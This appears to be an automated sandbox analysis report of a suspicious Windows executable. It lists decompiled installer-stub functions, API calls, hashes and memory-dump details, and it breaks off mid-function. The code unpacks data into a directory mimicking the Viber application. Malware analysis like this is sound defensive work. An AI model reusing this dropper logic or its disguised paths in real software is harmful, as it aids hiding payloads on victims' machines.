                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$Read$PointerWrite
                                                                                                        • String ID: @0A$KN
                                                                                                        • API String ID: 2113905535-1676535009
                                                                                                        • Opcode ID: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                        • Instruction ID: f0f891dec1baa82fcb152a6e3a42d02399587e043c2e4755ce28507b82245ee9
                                                                                                        • Opcode Fuzzy Hash: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                        • Instruction Fuzzy Hash: 3F315731501249EBDB21CF55DD40A9E7FBCEB843A5F20407AFA05A6190D3789F81DBA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403043, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E00403043(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417044; // 0x4e4bea
				_t37 = _t35 -  *0x40afb0 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BD3(1);
					return 0;
				}
				E004031F1( *0x41f054);
				SetFilePointer( *0x409018,  *0x40afb0, 0, 0); // executed
				 *0x41f050 = _t37;
				 *0x417040 = 0;
				while(1) {
					_t12 =  *0x417048; // 0x1aefbb
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f054;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031BF(0x413040, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f054 =  *0x41f054 + _t34;
					 *0x40afd0 = 0x413040;
					 *0x40afd4 = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						 *0x417040 =  *0x41f050 -  *0x417044 - _a4 +  *0x40afb0;
						E00402BD3(0);
					}
					 *0x40afd8 = 0x40b040;
					 *0x40afdc = 0x8000; // executed
					_t16 = E00405F82(0x40afb8); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd8; // 0x40d364
					_t40 = _t39 - 0x40b040;
					if(_t40 == 0) {
						__eflags =  *0x40afd4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417044; // 0x4e4bea
						if(_t18 -  *0x40afb0 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b040, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afb0 =  *0x40afb0 + _t40;
						_t53 =  *0x40afd4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}


















                                                                                                        0x00403047
                                                                                                        0x00403054
                                                                                                        0x00403067
                                                                                                        0x0040306c
                                                                                                        0x004031ad
                                                                                                        0x004031af
                                                                                                        0x00000000
                                                                                                        0x004031b5
                                                                                                        0x00403078
                                                                                                        0x0040308b
                                                                                                        0x00403091
                                                                                                        0x00403097
                                                                                                        0x004030a2
                                                                                                        0x004030a2
                                                                                                        0x004030a7
                                                                                                        0x004030ac
                                                                                                        0x004030b4
                                                                                                        0x004030b6
                                                                                                        0x004030b6
                                                                                                        0x004030bf
                                                                                                        0x004030c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004030cc
                                                                                                        0x004030d2
                                                                                                        0x004030d8
                                                                                                        0x00000000
                                                                                                        0x004030de
                                                                                                        0x004030e4
                                                                                                        0x00403104
                                                                                                        0x00403109
                                                                                                        0x0040310e
                                                                                                        0x00403114
                                                                                                        0x0040311a
                                                                                                        0x00403124
                                                                                                        0x0040312b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040312d
                                                                                                        0x00403133
                                                                                                        0x00403135
                                                                                                        0x00403169
                                                                                                        0x0040316f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403171
                                                                                                        0x00403173
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403175
                                                                                                        0x00403175
                                                                                                        0x00403188
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403197
                                                                                                        0x00000000
                                                                                                        0x00403197
                                                                                                        0x00403145
                                                                                                        0x0040314d
                                                                                                        0x004031a4
                                                                                                        0x004031aa
                                                                                                        0x004031aa
                                                                                                        0x00000000
                                                                                                        0x00403155
                                                                                                        0x00403155
                                                                                                        0x0040315b
                                                                                                        0x00403161
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403167
                                                                                                        0x004031a8
                                                                                                        0x004031a8
                                                                                                        0x00000000
                                                                                                        0x004031a8
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00403058
                                                                                                          • Part of subcall function 004031F1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000), ref: 0040308B
                                                                                                        • WriteFile.KERNELBASE(0040B040,0040D364,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403145
                                                                                                        • SetFilePointer.KERNELBASE(004E4BEA,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403197
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$Pointer$CountTickWrite
                                                                                                        • String ID: @0A$KN
                                                                                                        • API String ID: 2146148272-1676535009
                                                                                                        • Opcode ID: 09db56204c7f15284c341d007dee54cfa9a87c515f6ef0f82ef5e9c09c89c7a4
                                                                                                        • Instruction ID: c862c83604f3b109b9ae356e59bf9e99270c6d64ee518f880403d0392c1b0dc8
                                                                                                        • Opcode Fuzzy Hash: 09db56204c7f15284c341d007dee54cfa9a87c515f6ef0f82ef5e9c09c89c7a4
                                                                                                        • Instruction Fuzzy Hash: 4B41ABB25042029FD710CF29EE4096A7FBDF748356705423BE501BA2E1CB3C6E099B9E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E004056ED(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405684(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B66("C:\\Users\\hardz\\AppData\\Roaming\\ViberPC\\Icons", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                                        0x004015b3
                                                                                                        0x004015ba
                                                                                                        0x004015bd
                                                                                                        0x004015c2
                                                                                                        0x004015c6
                                                                                                        0x004015c8
                                                                                                        0x004015d0
                                                                                                        0x004015d6
                                                                                                        0x004015d8
                                                                                                        0x004015db
                                                                                                        0x004015e3
                                                                                                        0x004015f0
                                                                                                        0x004015fd
                                                                                                        0x004015fd
                                                                                                        0x004015f2
                                                                                                        0x004015f3
                                                                                                        0x004015fb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004015fb
                                                                                                        0x004015f0
                                                                                                        0x00401600
                                                                                                        0x00401603
                                                                                                        0x00401605
                                                                                                        0x00401606
                                                                                                        0x004015c8
                                                                                                        0x0040160d
                                                                                                        0x0040162d
                                                                                                        0x00402164
                                                                                                        0x0040160f
                                                                                                        0x00401611
                                                                                                        0x0040161c
                                                                                                        0x00401622
                                                                                                        0x00401622
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(0040549F,?,004218A8,00000000,00405751,004218A8,004218A8,?,?,74B5F560,0040549F,?,"C:\Users\user\Desktop\wogZe27GBB.exe" ,74B5F560), ref: 004056FB
                                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 00405700
                                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 0040570F
                                                                                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\ViberPC\Icons,00000000,00000000,000000F0), ref: 00401622
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Roaming\ViberPC\Icons, xrefs: 00401617
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                        • String ID: C:\Users\user\AppData\Roaming\ViberPC\Icons
                                                                                                        • API String ID: 3751793516-3850056743
                                                                                                        • Opcode ID: 6e6337e4574b2f3d3c7585ac3713e6f4ce480bba84fd94b859fb097d5a284765
                                                                                                        • Instruction ID: c38907cd9fbddcdb820990ab727de55d75fa8bca08f123d111df4852c942a759
                                                                                                        • Opcode Fuzzy Hash: 6e6337e4574b2f3d3c7585ac3713e6f4ce480bba84fd94b859fb097d5a284765
                                                                                                        • Instruction Fuzzy Hash: 7E010431D08141AFDB216F751D4497F27B0AA56369728073FF891B22E2C63C0942962E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040586C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040586C(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                        0x00405870
                                                                                                        0x00405876
                                                                                                        0x00405877
                                                                                                        0x00405877
                                                                                                        0x00405878
                                                                                                        0x0040587f
                                                                                                        0x00405889
                                                                                                        0x00405896
                                                                                                        0x00405899
                                                                                                        0x004058a1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004058a5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004058a7
                                                                                                        0x00000000
                                                                                                        0x004058a7
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 0040587F
                                                                                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405899
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CountFileNameTempTick
                                                                                                        • String ID: "C:\Users\user\Desktop\wogZe27GBB.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                        • API String ID: 1716503409-4219693410
                                                                                                        • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                        • Instruction ID: 7bdb262dbebad2fb51735791196b4a750b565e3ebaa120aaaad2cbe3184e43fd
                                                                                                        • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                        • Instruction Fuzzy Hash: B1F0A73734820876E7105E55DC04B9B7F9DDF91760F14C027FE44DA1C0D6B49954C7A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403208, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E00403208(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405DC8(_t6);
				_t2 = E004056C6(_t6);
				if(_t2 != 0) {
					E00405659(_t2, _t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040586C("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                                        0x00403209
                                                                                                        0x0040320f
                                                                                                        0x00403215
                                                                                                        0x0040321c
                                                                                                        0x00403221
                                                                                                        0x00403229
                                                                                                        0x00403235
                                                                                                        0x0040323b
                                                                                                        0x0040321f
                                                                                                        0x0040321f
                                                                                                        0x0040321f

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wogZe27GBB.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\wogZe27GBB.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                          • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\wogZe27GBB.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                        • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00403229
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                        • API String ID: 4115351271-1075807775
                                                                                                        • Opcode ID: abd89e45c2a658b1316b3d4f01b0b3756ccb9227471bfd75c63f163c6189ffd7
                                                                                                        • Instruction ID: 28437e5e833f6c5712a3d87292ca06883de7807d6adf700678bf42288e0e849f
                                                                                                        • Opcode Fuzzy Hash: abd89e45c2a658b1316b3d4f01b0b3756ccb9227471bfd75c63f163c6189ffd7
                                                                                                        • Instruction Fuzzy Hash: 11D0C922656E3032C651363A3C0AFDF091C8F5271AF55847BF908B40D64B6C5A5259EF
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 99%
                                                                                                        			E00406566() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004069D4))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
